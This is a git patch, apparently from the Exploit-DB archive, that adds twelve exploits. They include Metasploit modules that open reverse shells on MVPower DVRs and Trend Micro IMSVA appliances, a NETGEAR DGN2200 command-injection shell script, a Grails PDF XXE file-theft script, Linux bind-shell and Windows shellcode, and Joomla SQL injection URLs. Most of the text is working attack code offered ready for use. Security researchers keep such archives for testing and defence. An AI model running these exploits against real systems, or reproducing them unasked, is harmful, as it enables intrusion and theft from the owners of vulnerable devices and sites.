From 026ded7298a653238436b01b64b647702ece686f Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 28 Feb 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-02-28 12 new exploits MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit) Windows x86 - Executable Directory Search Shellcode (130 bytes) Linux/x86_64 - Random Listener Shellcode (54 bytes) NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit) Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection Joomla! Component My MSG 3.2.1 - SQL Injection Joomla! Component Spinner 360 1.3.0 - SQL Injection Joomla! Component JomSocial - SQL Injection Grails PDF Plugin 0.6 - XML External Entity Injection Joomla! Component OneVote! 1.0 - SQL Injection --- files.csv | 12 ++ platforms/arm/remote/41471.rb | 97 +++++++++++++++ platforms/hardware/webapps/41459.py | 40 ++++++ platforms/java/webapps/41466.py | 140 +++++++++++++++++++++ platforms/lin_x86-64/shellcode/41468.nasm | 73 +++++++++++ platforms/multiple/webapps/41461.rb | 144 ++++++++++++++++++++++ platforms/php/webapps/41460.txt | 17 +++ platforms/php/webapps/41462.txt | 22 ++++ platforms/php/webapps/41463.txt | 22 ++++ platforms/php/webapps/41464.txt | 17 +++ platforms/php/webapps/41465.txt | 20 +++ platforms/php/webapps/41470.txt | 18 +++ platforms/win_x86/shellcode/41467.c | 90 ++++++++++++++ 13 files changed, 712 insertions(+) create mode 100755 platforms/arm/remote/41471.rb create mode 100755 platforms/hardware/webapps/41459.py create mode 100755 platforms/java/webapps/41466.py create mode 100755 platforms/lin_x86-64/shellcode/41468.nasm create mode 100755 platforms/multiple/webapps/41461.rb create mode 100755 platforms/php/webapps/41460.txt create mode 100755 platforms/php/webapps/41462.txt create mode 100755 platforms/php/webapps/41463.txt create mode 100755 platforms/php/webapps/41464.txt create mode 100755 platforms/php/webapps/41465.txt create mode 100755 platforms/php/webapps/41470.txt create mode 100755 platforms/win_x86/shellcode/41467.c diff --git a/files.csv b/files.csv index bb5162131..5338845f8 100644 --- a/files.csv +++ b/files.csv @@ -15300,6 +15300,7 @@ id,file,description,date,author,platform,type,port 41366,platforms/java/remote/41366.java,"OpenText Documentum D2 - Remote Code Execution",2017-02-15,"Andrey B. Panfilov",java,remote,0 41436,platforms/windows/remote/41436.py,"Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH)",2017-02-22,"Peter Baris",windows,remote,0 41443,platforms/macos/remote/41443.html,"macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution and Arbitrary File Read",2017-02-23,"Google Security Research",macos,remote,0 +41471,platforms/arm/remote/41471.rb,"MVPower DVR TV-7104HE 1.8.4 115215B9 - Shell Unauthenticated Command Execution (Metasploit)",2017-02-27,Metasploit,arm,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -15917,6 +15918,8 @@ id,file,description,date,author,platform,type,port 41398,platforms/linux/shellcode/41398.nasm,"Linux - Reverse Shell Shellcode (66 bytes)",2017-02-19,"Robert L. Taylor",linux,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,"Krzysztof Przybylski",lin_x86,shellcode,0 41439,platforms/linux/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,linux,shellcode,0 +41467,platforms/win_x86/shellcode/41467.c,"Windows x86 - Executable Directory Search Shellcode (130 bytes)",2017-02-26,"Krzysztof Przybylski",win_x86,shellcode,0 +41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0 @@ -37375,3 +37378,12 @@ id,file,description,date,author,platform,type,port 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0 41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41459,platforms/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,hardware,webapps,0 +41460,platforms/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' Parameter SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41461,platforms/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",multiple,webapps,0 +41462,platforms/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41463,platforms/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41464,platforms/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41465,platforms/php/webapps/41465.txt,"Joomla! Component JomSocial - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0 +41466,platforms/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",java,webapps,0 +41470,platforms/php/webapps/41470.txt,"Joomla! Component OneVote! 1.0 - SQL Injection",2017-02-27,"Ihsan Sencan",php,webapps,0 diff --git a/platforms/arm/remote/41471.rb b/platforms/arm/remote/41471.rb new file mode 100755 index 000000000..d91ddffef --- /dev/null +++ b/platforms/arm/remote/41471.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + HttpFingerprint = { :pattern => [ /JAWS\/1\.0/ ] } + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'MVPower DVR Shell Unauthenticated Command Execution', + 'Description' => %q{ + This module exploits an unauthenticated remote command execution + vulnerability in MVPower digital video recorders. The 'shell' file + on the web interface executes arbitrary operating system commands in + the query string. + + This module was tested successfully on a MVPower model TV-7104HE with + firmware version 1.8.4 115215B9 (Build 2014/11/17). + + The TV-7108HE model is also reportedly affected, but untested. + }, + 'Author' => + [ + 'Paul Davies (UHF-Satcom)', # Initial vulnerability discovery and PoC + 'Andrew Tierney (Pen Test Partners)', # Independent vulnerability discovery and PoC + 'Brendan Coles ' # Metasploit + ], + 'License' => MSF_LICENSE, + 'Platform' => 'linux', + 'References' => + [ + # Comment from Paul Davies contains probably the first published PoC + [ 'URL', 'https://labby.co.uk/cheap-dvr-teardown-and-pinout-mvpower-hi3520d_v1-95p/' ], + # Writeup with PoC by Andrew Tierney from Pen Test Partners + [ 'URL', 'https://www.pentestpartners.com/blog/pwning-cctv-cameras/' ] + ], + 'DisclosureDate' => 'Aug 23 2015', + 'Privileged' => true, # BusyBox + 'Arch' => ARCH_ARMLE, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/armle/mettle_reverse_tcp', + 'CMDSTAGER::FLAVOR' => 'wget' + }, + 'Targets' => + [ + ['Automatic', {}] + ], + 'CmdStagerFlavor' => %w{ echo printf wget }, + 'DefaultTarget' => 0)) + end + + def check + begin + fingerprint = Rex::Text::rand_text_alpha(rand(10) + 6) + res = send_request_cgi( + 'uri' => "/shell?echo+#{fingerprint}", + 'headers' => { 'Connection' => 'Keep-Alive' } + ) + if res && res.body.include?(fingerprint) + return CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + return CheckCode::Unknown + end + CheckCode::Safe + end + + def execute_command(cmd, opts) + begin + send_request_cgi( + 'uri' => "/shell?#{Rex::Text.uri_encode(cmd, 'hex-all')}", + 'headers' => { 'Connection' => 'Keep-Alive' } + ) + rescue ::Rex::ConnectionError + fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") + end + end + + def exploit + print_status("#{peer} - Connecting to target") + + unless check == CheckCode::Vulnerable + fail_with(Failure::Unknown, "#{peer} - Target is not vulnerable") + end + + print_good("#{peer} - Target is vulnerable!") + + execute_cmdstager(linemax: 1500) + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/41459.py b/platforms/hardware/webapps/41459.py new file mode 100755 index 000000000..e8837050c --- /dev/null +++ b/platforms/hardware/webapps/41459.py @@ -0,0 +1,40 @@ +#!/usr/bin/python + +#Provides access to default user account, privileges can be easily elevated by using either: +# - a kernel exploit (ex. memodipper was tested and it worked) +# - by executing /bin/bd (suid backdoor present on SOME but not all versions) +# - by manipulating the httpd config files to trick the root user into executing your code (separate advisory will be released soon) + +#Pozdrawiam: Kornela, Komara i Sknerusa + +import sys +import requests + +#You can change these credentials to ex. Gearguy/Geardog or Guest/Guest which are hardcoded on SOME firmware versions +#These routers DO NOT support telnet/ssh access so you can use this exploit to access the shell if you want to + +login = 'admin' +password = 'password' + +def main(): + if len(sys.argv) < 2: + print "./netgearpwn_2.py " + return + spawnShell() + +def execute(cmd): #Escaping basic sanitization + requests.post("http://" + sys.argv[1] + "/dnslookup.cgi", data={'host_name':"www.google.com; " + cmd, 'lookup': "Lookup"}, auth=(login, password)) + return + +def spawnShell(): + print "Dropping a shell-like environment (blind OS injection)" + print "To test it type 'reboot'" + while True: + cmd = raw_input("[blind $] ") + execute(cmd) + +if __name__ == "__main__": + main() + +#2017-02-25 by SivertPL +#Tak, to ja. diff --git a/platforms/java/webapps/41466.py b/platforms/java/webapps/41466.py new file mode 100755 index 000000000..4d686172a --- /dev/null +++ b/platforms/java/webapps/41466.py @@ -0,0 +1,140 @@ +# Exploit Title: Grails PDF Plugin 0.6 XXE +# Date: 21/02/2017 +# Vendor Homepage: http://www.grails.org/plugin/pdf +# Software Link: https://github.com/aeischeid/grails-pdfplugin +# Exploit Author: Charles FOL +# Contact: https://twitter.com/ambionics +# Website: https://www.ambionics.io/blog/grails-pdf-plugin-xxe +# Version: 0.6 +# CVE : N/A + + +1. dump_file.py + +#!/usr/bin/python3 +# Grails PDF Plugin XXE +# cf +# https://www.ambionics.io/blog/grails-pdf-plugin-xxe + +import requests +import sys +import os + +# Base URL of the Grails target +URL = 'http://10.0.0.179:8080/grailstest' +# "Bounce" HTTP Server +BOUNCE = 'http://10.0.0.138:7777/' + + +session = requests.Session() +pdfForm = '/pdf/pdfForm?url=' +renderPage = 'render.html' + +if len(sys.argv) < 0: + print('usage: ./%s ' % sys.argv[0]) + print('e.g.: ./%s file:///etc/passwd' % sys.argv[0]) + exit(0) + +resource = sys.argv[1] + +# Build the full URL +full_url = URL + pdfForm + pdfForm + BOUNCE + renderPage +full_url += '&resource=' + sys.argv[1] + +r = requests.get(full_url, allow_redirects=False) + +#print(full_url) + +if r.status_code != 200: + print('Error: %s' % r) +else: + with open('/tmp/file.pdf', 'wb') as handle: + handle.write(r.content) + os.system('pdftotext /tmp/file.pdf') + with open('/tmp/file.txt', 'r') as handle: + print(handle.read(), end='') + + +2. server.py + +#!/usr/bin/python3 +# Grails PDF Plugin XXE +# cf +# https://www.ambionics.io/blog/grails-pdf-plugin-xxe +# +# Server part of the exploitation +# +# Start it in an empty folder: +# $ mkdir /tmp/empty +# $ mv server.py /tmp/empty +# $ /tmp/empty/server.py + +import http.server +import socketserver +import sys + + +BOUNCE_IP = '10.0.0.138' +BOUNCE_PORT = int(sys.argv[1]) if len(sys.argv) > 1 else 80 + +# Template for the HTML page +template = """ + + + "> + +%dtd; +]> + + + + + + 
&all;
+ +""" + +# The external DTD trick allows us to get more files; they would've been +invalid +# otherwise +# See: https://www.vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf +dtd = """ + +""" + +# Really hacky. When the render.html page is requested, we extract the +# 'resource=XXX' part of the URL and create an HTML file which XXEs it. +class GetHandler(http.server.SimpleHTTPRequestHandler): + def do_GET(self): + if 'render.html' in self.path: + resource = self.path.split('resource=')[1] + print('Resource: %s' % resource) + page = template + page = page.replace('[RESOURCE]', resource) + page = page.replace('[BOUNCE]', '%s:%d' % (BOUNCE_IP, +BOUNCE_PORT)) + + with open('render.html', 'w') as handle: + handle.write(page) + + return super().do_GET() + + +Handler = GetHandler +httpd = socketserver.TCPServer(("", BOUNCE_PORT), Handler) + +with open('out.dtd', 'w') as handle: + handle.write(dtd) + +print("Started HTTP server on port %d, press Ctrl-C to exit..." % +BOUNCE_PORT) +try: + httpd.serve_forever() +except KeyboardInterrupt: + print("Keyboard interrupt received, exiting.") + httpd.server_close() + + diff --git a/platforms/lin_x86-64/shellcode/41468.nasm b/platforms/lin_x86-64/shellcode/41468.nasm new file mode 100755 index 000000000..2d436e4ee --- /dev/null +++ b/platforms/lin_x86-64/shellcode/41468.nasm @@ -0,0 +1,73 @@ +;The MIT License (MIT) + +;Copyright (c) 2017 Robert L. Taylor + +;Permission is hereby granted, free of charge, to any person obtaining a +;copy of this software and associated documentation files (the “Software”), +;to deal in the Software without restriction, including without limitation +;the rights to use, copy, modify, merge, publish, distribute, sublicense, +;and/or sell copies of the Software, and to permit persons to whom the +;Software is furnished to do so, subject to the following conditions: + +;The above copyright notice and this permission notice shall be included +;in all copies or substantial portions of the Software. + +;The Software is provided “as is”, without warranty of any kind, express or +;implied, including but not limited to the warranties of merchantability, +;fitness for a particular purpose and noninfringement. In no event shall the +;authors or copyright holders be liable for any claim, damages or other +;liability, whether in an action of contract, tort or otherwise, arising +;from, out of or in connection with the software or the use or other +;dealings in the Software. +; +; For a detailed explanation of this shellcode see my blog post: +; http://a41l4.blogspot.ca/2017/02/shellrandomlisten1434.html + +global _start + +section .text + +_start: +; Socket + push 41 + pop rax + push 2 + pop rdi + push 1 + pop rsi + cdq + syscall +; Listen + xor esi,esi + xchg eax,edi + mov al,50 + syscall +; Accept + mov al,43 + syscall +; Dup 2 + push 3 + pop rsi + xchg edi,eax +dup2loop: + push 33 + pop rax + dec esi + syscall + jne dup2loop +; Execve + ; rax and rsi and rdx are zero already + push rax ; zero terminator for the following string that we are pushing + + ; push /bin//sh in reverse + mov rbx, '/bin//sh' + push rbx + + ; store /bin//sh address in RDI + push rsp + pop rdi + + ; Call the Execve syscall + mov al, 59 + syscall + \ No newline at end of file diff --git a/platforms/multiple/webapps/41461.rb b/platforms/multiple/webapps/41461.rb new file mode 100755 index 000000000..fbdce0994 --- /dev/null +++ b/platforms/multiple/webapps/41461.rb @@ -0,0 +1,144 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => 'Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution', + 'Description' => %q{ + This module exploits a command injection vulnerability in the Trend Micro + IMSVA product. An authenticated user can execute a terminal command under + the context of the web server user which is root. Besides, default installation + of IMSVA comes with a default administrator credentials. + saveCert.imss endpoint takes several user inputs and performs blacklisting. + After that it use them as argument of predefined operating system command + without proper sanitation. However,due to improper blacklisting rule it's possible to inject + arbitrary commands into it. InterScan Messaging Security prior to 9.1.-1600 affected by this issue. + This module was tested against IMSVA 9.1-1600. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # discovery & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-trend-micro-interscan-messaging-security-virtual-appliance-remote-code-execution/'] + ], + 'Privileged' => true, + 'Payload' => + { + 'Space' => 1024, + 'DisableNops' => true, + 'BadChars' => "\x2f\x22" + }, + 'DefaultOptions' => + { + 'SSL' => true, + 'payload' => 'python/meterpreter/reverse_tcp', + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => 'Jan 15 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The target URI of the Trend Micro IMSVA', '/']), + OptString.new('USERNAME', [ true, 'The username for authentication', 'admin' ]), + OptString.new('PASSWORD', [ true, 'The password for authentication', 'imsva' ]), + Opt::RPORT(8445) + ] + ) + end + + def login + + user = datastore['USERNAME'] + pass = datastore['PASSWORD'] + + print_status("Attempting to login with #{user}:#{pass}") + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'login.imss'), + 'vars_post' => { + 'userid' => user, + 'pwdfake' => Rex::Text::encode_base64(pass) + } + }) + + if res && res.body.include?("The user name or password you entered is invalid") + fail_with(Failure::NoAccess, "#{peer} - Login with #{user}:#{pass} failed...") + end + + cookie = res.get_cookies + if res.code == 302 && cookie.include?("JSESSIONID") + jsessionid = cookie.scan(/JSESSIONID=(\w+);/).flatten.first + print_good("Authenticated as #{user}:#{pass}") + return jsessionid + end + + nil + end + + def exploit + + jsessionid = login + + unless jsessionid + fail_with(Failure::Unknown, 'Unable to obtain the cookie session ID') + end + + # Somehow java stores last visited url on session like viewstate! + # Visit form before submitting it. Otherwise, it will cause a crash. + + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'initCert.imss'), + 'cookie' => "JSESSIONID=#{jsessionid}" + }) + + if !res or !res.body.include?("Transport Layer Security") + fail_with(Failure::Unknown, 'Unable to visit initCert.imss') + end + + # Random string that will be used as a cert name, state, email etc. + r = Rex::Text::rand_text_alphanumeric(5) + + print_status("Delivering payload...") + + # Since double quote are blacklisted, we are using Single, Backslash, Single, Single on our payload. Thanks to @wvu !!! + res = send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'saveCert.imss'), + 'cookie' => "JSESSIONID=#{jsessionid}", + 'vars_get' => { + 'mode' => 0 + }, + 'vars_post' => { + 'certName' => r, + 'certType' => 0, + 'keyLength' => 2048, + 'countryCode' => 'TR', + 'state' => r, + 'locality' => r, + 'org' => r, + 'orgUnit' => r, + 'commonName' => "#{r}';python -c '#{payload.encoded.gsub("'", "'\\\\''")}' #", + 'emailAddress' => "#{r}@mail.com", + 'validDays' => '', + 'id' => '', + } + }) + end + +end diff --git a/platforms/php/webapps/41460.txt b/platforms/php/webapps/41460.txt new file mode 100755 index 000000000..76e461371 --- /dev/null +++ b/platforms/php/webapps/41460.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Gnosis v1.1.2 - SQL Injection +# Google Dork: inurl:index.php?option=com_gnosis +# Date: 25.02.2017 +# Vendor Homepage: http://hypermodern.org/ +# Software : https://extensions.joomla.org/extensions/extension/directory-a-documentation/glossary/gnosis/ +# Demo: http://gnosis.hypermodern.org/index.php/dictionary +# Version: 1.1.2 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/index.php?option=com_gnosis&view=tags&id=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41462.txt b/platforms/php/webapps/41462.txt new file mode 100755 index 000000000..d94380129 --- /dev/null +++ b/platforms/php/webapps/41462.txt @@ -0,0 +1,22 @@ +# # # # # +# Exploit Title: Joomla! Component Appointments for JomSocial v3.8.1 - SQL Injection +# Google Dork: N/A +# Date: 25.02.2017 +# Vendor Homepage: https://www.cmsplugin.com/ +# Software : https://www.cmsplugin.com/products/components/1-appointments-for-jomsocial +# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-appointments/ +# Version: 3.8.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/my-appointments/viewappointment?id=[SQL] +# http://localhost/[PATH]/my-appointments/my-appointments/edit?id=[SQL] +# '+order+by+10-- - +# Etc... +# # # # # + diff --git a/platforms/php/webapps/41463.txt b/platforms/php/webapps/41463.txt new file mode 100755 index 000000000..c713b16ac --- /dev/null +++ b/platforms/php/webapps/41463.txt @@ -0,0 +1,22 @@ +# # # # # +# Exploit Title: Joomla! Component My MSG v3.2.1 - SQL Injection +# Google Dork: N/A +# Date: 25.02.2017 +# Vendor Homepage: https://www.cmsplugin.com/ +# Software : https://www.cmsplugin.com/products/components/10-my-msg +# Demo: http://extensions.cmsplugin.com/extensions/j3demo/my-msg +# Version: 3.2.1 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/index.php?option=com_mymsg&layout=edit&reply_id=[SQL] +# http://localhost/[PATH]/index.php?option=com_mymsg&view=msg&filter_box=[SQL] +# http://localhost/[PATH]/index.php?option=com_mymsg&view=mymsg&Ihsan_Sencan=[SQL] +# '+order+by+10-- - +# Etc... +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41464.txt b/platforms/php/webapps/41464.txt new file mode 100755 index 000000000..5810ee1d6 --- /dev/null +++ b/platforms/php/webapps/41464.txt @@ -0,0 +1,17 @@ +# # # # # +# Exploit Title: Joomla! Component Spinner 360 v1.3.0 - SQL Injection +# Google Dork: N/A +# Date: 25.02.2017 +# Vendor Homepage: https://www.cmsplugin.com/ +# Software : https://www.cmsplugin.com/products/components/13-spinner360 +# Demo: http://extensions.cmsplugin.com/extensions/j3demo/spinner-360 +# Version: 1.3.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/spinner-360?Ihsan_Sencan=[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41465.txt b/platforms/php/webapps/41465.txt new file mode 100755 index 000000000..0bfd96327 --- /dev/null +++ b/platforms/php/webapps/41465.txt @@ -0,0 +1,20 @@ +# # # # # +# Exploit Title: Joomla! Component JomSocial - SQL Injection +# Google Dork: N/A +# Date: 25.02.2017 +# Vendor Homepage: https://www.cmsplugin.com/ +# Software : http://extensions.cmsplugin.com/extensions/j3demo/jomsocial +# Demo: http://extensions.cmsplugin.com/extensions/j3demo/jomsocial +# Version: N/A +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# Login as regular user +# http://localhost/[PATH]/groups/?IhsanSencan=[SQL] +# http://localhost/[PATH]/videos/?IhsanSencan=[SQL] +# http://localhost/[PATH]/events/?IhsanSencan=[SQL] +# # # # # diff --git a/platforms/php/webapps/41470.txt b/platforms/php/webapps/41470.txt new file mode 100755 index 000000000..87cd52a4b --- /dev/null +++ b/platforms/php/webapps/41470.txt @@ -0,0 +1,18 @@ +# # # # # +# Exploit Title: Joomla! Component OneVote! v1.0 - SQL Injection +# Google Dork: inurl:index.php?option=com_onevote +# Date: 27.02.2017 +# Vendor Homepage: http://advcomsys.com/ +# Software: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/polls/onevote/ +# Demo: http://advcomsys.com/index.php/joomla-demos/elections +# Version: 1.0 +# Tested on: Win7 x64, Kali Linux x64 +# # # # # +# Exploit Author: Ihsan Sencan +# Author Web: http://ihsan.net +# Author Mail : ihsan[@]ihsan[.]net +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/components/com_onevote/results.php?election_id=[SQL] +# +/*!50000union*/+select+@@version-- - +# # # # # diff --git a/platforms/win_x86/shellcode/41467.c b/platforms/win_x86/shellcode/41467.c new file mode 100755 index 000000000..40359279d --- /dev/null +++ b/platforms/win_x86/shellcode/41467.c @@ -0,0 +1,90 @@ +# Title: Windows x86 - Executable directory search Shellcode (130 bytes) +# Date: 26-02-2017 +# Author: Krzysztof Przybylski +# Platform: Win_x86 +# Tested on: WinXP SP1 +# Shellcode Size: 130 bytes + +/* +Description: +write & exec dir searcher +starts from C:\ +If dir found then write, execute (ping 127.1.1.1) and exit +If Write/noexec dir found then continue + +Tested on WinXP SP1 (77e6fd35;77e798fd) +i686-w64-mingw32-gcc shell.c -o golddgger.exe + +Null-free version: + +(gdb) disassemble +Dump of assembler code for function function: +=> 0x08048062 <+0>: pop ecx + 0x08048063 <+1>: xor eax,eax + 0x08048065 <+3>: mov BYTE PTR [ecx+0x64],al + 0x08048068 <+6>: push eax + 0x08048069 <+7>: push ecx + 0x0804806a <+8>: mov eax,0x77e6fd35 + 0x0804806f <+13>: call eax + 0x08048071 <+15>: xor eax,eax + 0x08048073 <+17>: push eax + 0x08048074 <+18>: mov eax,0x77e798fd + 0x08048079 <+23>: call eax + + +NULL-free shellcode (132 bytes): + +"\xeb\x19\x59\x31\xc0\x88\x41\x64" +"\x50\x51\xb8" +"\x35\xfd\xe6\x77" // exec +"\xff\xd0\x31\xc0\x50\xb8" +"\xfd\x98\xe7\x77" // exit +"\xff\xd0\xe8\xe2\xff\xff\xff" +"\x63\x6d\x64\x2e\x65\x78\x65\x20" +"\x2f\x43\x20\x22\x28\x63\x64\x20" +"\x63\x3a\x5c" // C:\ +"\x20\x26\x46\x4f\x52" +"\x20\x2f\x44\x20\x2f\x72\x20\x25" +"\x41\x20\x49\x4e\x20\x28\x2a\x29" +"\x20\x44\x4f\x20" +"\x65\x63\x68\x6f\x20" +"\x70\x69\x6e\x67\x20" +"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 +"\x3e\x22\x25\x41\x5c\x7a\x2e\x62" +"\x61\x74\x22\x26\x28\x63\x61\x6c" +"\x6c\x20\x22\x25\x41\x5c\x7a\x2e" +"\x62\x61\x74\x22\x26\x26\x65\x78" +"\x69\x74\x29\x29\x22"; + +*/ +// NULL version (130 bytes): + +char code[] = +"\xeb\x16\x59\x31\xc0\x50\x51\xb8" +"\x35\xfd\xe6\x77" // exec +"\xff\xd0\x31\xc0\x50\xb8" +"\xfd\x98\xe7\x77" // exit +"\xff\xd0\xe8\xe5\xff\xff\xff\x63" +"\x6d\x64\x2e\x65\x78\x65\x20\x2f" +"\x43\x20\x22\x28\x63\x64\x20" +"\x63\x3a\x5c" // C:\ +"\x20\x26\x46\x4f\x52\x20\x2f\x44" +"\x20\x2f\x72\x20\x25\x41\x20\x49" +"\x4e\x20\x28\x2a\x29\x20\x44\x4f" +"\x20\x65\x63\x68\x6f\x20\x70\x69" +"\x6e\x67\x20" +"\x31\x37\x32\x2e\x31\x2e\x31\x2e\x31" // 127.1.1.1 +"\x3e\x22\x25\x41" +"\x5c\x7a\x2e\x62\x61\x74\x22\x26" +"\x28\x63\x61\x6c\x6c\x20\x22\x25" +"\x41\x5c\x7a\x2e\x62\x61\x74\x22" +"\x26\x26\x65\x78\x69\x74\x29\x29" +"\x22\x00"; + +int main(int argc, char **argv) + +{ + int (*func)(); + func = (int (*)()) code; + (int)(*func)(); +}